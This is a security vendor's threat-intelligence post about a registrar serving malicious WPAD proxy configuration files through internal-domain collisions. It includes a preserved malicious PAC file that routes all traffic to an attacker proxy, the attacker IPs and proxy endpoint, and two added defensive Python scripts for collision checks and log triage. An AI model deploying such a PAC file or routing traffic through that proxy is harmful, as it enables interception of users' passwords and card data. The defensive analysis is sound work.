February 19, 2019 by Nick Griffin

Performanta has uncovered widespread abuse by a Czech registrar named Gransy s.r.o., resulting in a mass-scale attack on organisations through the Web Proxy Auto-Discovery Protocol (WPAD). The attack causes all HTTP(S) traffic to be routed through the attacker’s server, giving the attacker visibility of sensitive information such as passwords and credit card details.

Web Proxy Auto-Discovery Protocol (WPAD)

WPAD is a scheme used by operating systems to automatically configure web (i.e. HTTP and HTTPS) proxy settings. The feature is turned on by default in Windows operating systems, which is potentially dangerous.

The auto-discovery mechanism of WPAD attempts to find a “wpad.dat” configuration file on the current network. It first tries to obtain the URL of the file through DHCP. If DHCP does not provide one, it falls back to DNS and attempts to download the file from the internal domain over HTTP, trying the following URLs in order:

1. http://wpad.department.branch.domain.tld/wpad.dat
2. http://wpad.branch.domain.tld/wpad.dat
3. http://wpad.domain.tld/wpad.dat

If a valid “wpad.dat” PAC file is found, the proxy settings of the machine are configured. Usually this is not a problem. However, consider the following scenario:

  • An organisation uses “mydomain.com” as its internal domain name but does not own “mydomain.com” publicly
  • An attacker registers “mydomain.com” publicly
  • Machines that belong to the internal “mydomain.com” domain are moved to another network and begin using that network’s DNS server, which is not authoritative for “mydomain.com”
  • The machines attempt to resolve “wpad.mydomain.com” via DNS, and these requests reach the attacker’s nameservers
  • The attacker answers the DNS request for “wpad.mydomain.com” with an attacker-controlled IP address
  • The machines connect to the attacker’s IP over HTTP and request “wpad.mydomain.com/wpad.dat”
  • The attacker responds with a malicious “wpad.dat” file specifying that all traffic should be routed through the attacker’s network infrastructure
  • The machines configure their operating system proxy settings to route all HTTP and HTTPS traffic through the attacker’s server
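The two steps above that a defender can check for themselves are the discovery order and the collision: which “wpad.” names a machine will look up for its DNS domain, and whether any of them resolve outside the organisation’s own address space. The following is an added example, not code from the original post; the DNS answers and trusted networks are constructed (the first answer reuses a Parktons IP from the post to show what a collided lookup looks like).

```python
import ipaddress

# Constructed answers standing in for public DNS; the first entry reuses a
# Parktons IP from the post to show what a collided lookup looks like.
SAMPLE_DNS = {
    "wpad.mydomain.com": "159.253.25.197",   # registered by someone else
    "wpad.example.org": "203.0.113.10",      # owned by the organisation
}
# Constructed address space that the organisation controls.
TRUSTED_NETS = ["10.0.0.0/8", "203.0.113.0/24"]


def wpad_candidate_urls(dns_domain):
    """Reproduce the discovery order: 'wpad.' is prefixed to successively
    shorter suffixes of the machine's DNS domain, stopping at domain.tld so
    the bare TLD is never queried."""
    labels = [l for l in dns_domain.lower().strip(".").split(".") if l]
    return [
        "http://wpad." + ".".join(labels[i:]) + "/wpad.dat"
        for i in range(len(labels) - 1)
    ]


def wpad_collision_report(dns_domain, resolve, trusted_nets):
    """For each candidate, record where the name resolves and whether that
    address belongs to the organisation. 'resolve' is injected so the check
    runs offline here; in production pass a wrapper around
    socket.gethostbyname that returns None on failure."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    report = []
    for url in wpad_candidate_urls(dns_domain):
        host = url.split("/")[2]
        ip = resolve(host)
        if ip is None:
            continue  # NXDOMAIN: nothing for an attacker to answer
        addr = ipaddress.ip_address(ip)
        report.append({"url": url, "ip": ip,
                       "trusted": any(addr in net for net in nets)})
    return report


def collisions(dns_domain, resolve=SAMPLE_DNS.get, trusted_nets=TRUSTED_NETS):
    """Candidate WPAD URLs that resolve outside the organisation's space."""
    return [r["url"] for r in wpad_collision_report(dns_domain, resolve, trusted_nets)
            if not r["trusted"]]
```

A non-empty result from `collisions()` for a real internal domain means the public owner of that name, whoever it is, receives your machines’ WPAD requests whenever they leave the corporate network.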

This is clearly a problem. In fact, US-CERT specifically warned people of this back in 2016.

It is worth noting, however, that to snoop on HTTPS traffic the attacker would need to man-in-the-middle (MITM) TLS connections by presenting their own certificate. This would typically result in browser client warnings, but users often manually override this.

Gransy s.r.o.

Since mid-2017, we have been monitoring a nefarious Czech registrar called Gransy s.r.o. which we have associated with malicious WPAD activity. This registrar has many subsidiaries and domain names, such as “subreg.cz”, “parktons.com”, “regtons.com”, and “NEROSO Inst.”.

Gransy has been registering expired domain names and parking them for many years. Whilst this is not unusual in itself, these domains have been responding to WPAD subdomains and serving malicious WPAD files since at least July 2017. Many of the domains they have purchased are used internally by organisations who have failed to maintain ownership of the domain publicly. As such, domain collisions have occurred, resulting in organisational HTTP(S) traffic being redirected through a Gransy-owned IP address. We can see no legitimate reason why this registrar’s domain parking platform would be serving WPAD files except to purposely and illegally spy on traffic through domain collisions.

An example of WPAD abuse by this registrar can be found at the URL below, which is still live as of February 13, 2019. This domain appears likely to have previously been owned by Silk Way Bank (now Premium Bank) in Azerbaijan.

hxxp://wpad.swbank.az/wpad.dat

More generically, this WPAD file can be obtained from the following URLs:

hxxp://159.253.25.197/wpad.dat
hxxp://159.253.28.197/wpad.dat
hxxp://31.192.228.197/wpad.dat

The content of the WPAD file has been preserved below.

function FindProxyForURL(url, host) {
    return 'PROXY 185.82.212.95:8080; DIRECT';
}

Performanta have reported this registrar for abuse to ICANN and will continue to monitor.

Mitigations

To prevent WPAD abuse through both this and other techniques, the following mitigations are highly advised:

  • Turn off WPAD throughout your organisation unless it is strictly necessary
  • Ensure that any internal domain names that are also valid public domain names are registered to your organisation publicly and kept under your ownership
  • Change your internal domain names to use TLDs reserved by ICANN for non-public use, such as “.corp” or “.local”

For this particular attack, we also recommend blocking the IPs listed in the “Indicators of Compromise” below.

Indicators of Compromise (IOCs)

Parktons IPs

Blocking these IPs will help to prevent malicious WPAD files from being downloaded. Seeing these IPs in your environment does not necessarily mean that you are impacted, however, unless the communication with them was to a WPAD subdomain.

159.253.25.197
159.253.28.197
31.192.228.197

Gransy Proxy

This IP:Port is associated with malicious activity.

185.82.212.95:8080
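The caveat above (a Parktons IP alone is weak evidence, a wpad.dat fetch from it or any use of the Gransy proxy is strong) is the kind of rule worth encoding in a triage script. The following is an added example, not code from the original post: it applies that rule to constructed egress log lines and also extracts the PROXY targets from the PAC file preserved above so an unexpected proxy can be flagged before it is trusted.

```python
import re

# Indicators from the post: the IPs that served the malicious wpad.dat and
# the proxy endpoint that file sends all traffic through.
PARKTONS_IPS = {"159.253.25.197", "159.253.28.197", "31.192.228.197"}
GRANSY_PROXY = "185.82.212.95:8080"

# Constructed sample egress log lines (key=value fields), not real telemetry.
SAMPLE_LOGS = [
    "src=10.1.2.3 dst=159.253.25.197:80 host=wpad.swbank.az path=/wpad.dat",
    "src=10.1.2.4 dst=159.253.28.197:80 host=www.example.com path=/",
    "src=10.1.2.5 dst=185.82.212.95:8080 host=intranet.example.com path=/login",
    "src=10.1.2.6 dst=192.0.2.10:80 host=wpad.example.com path=/wpad.dat",
]

# The PAC file preserved in the post, reused here as sample input.
SAMPLE_PAC = """function FindProxyForURL(url, host) {
 return 'PROXY 185.82.212.95:8080; DIRECT';
}"""

PROXY_RE = re.compile(r"\bPROXY\s+([^;\s'\"]+)")


def parse_line(line):
    return dict(field.split("=", 1) for field in line.split())


def classify(line):
    """Apply the post's rule: a Parktons IP alone is weak evidence; a
    wpad.dat fetch from it, or any use of the Gransy proxy, is strong."""
    f = parse_line(line)
    dst_ip = f["dst"].split(":")[0]
    wpad_fetch = f["host"].lower().startswith("wpad.") and f["path"] == "/wpad.dat"
    if f["dst"] == GRANSY_PROXY:
        # A client only talks to this proxy once the malicious PAC is applied.
        return "HIGH: traffic proxied through Gransy proxy"
    if dst_ip in PARKTONS_IPS:
        if wpad_fetch:
            return "HIGH: malicious wpad.dat downloaded"
        # These IPs also host ordinary parked domains.
        return "LOW: contact with Parktons IP, not a WPAD request"
    return None


def pac_proxies(pac_text):
    """Every host:port a PAC script can hand back in a PROXY directive."""
    return PROXY_RE.findall(pac_text)


def pac_is_suspicious(pac_text, approved_proxies):
    # Any proxy that is not one of the organisation's own is cause for alarm.
    return any(p not in approved_proxies for p in pac_proxies(pac_text))
```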

© 2019 Performanta. All Rights Reserved.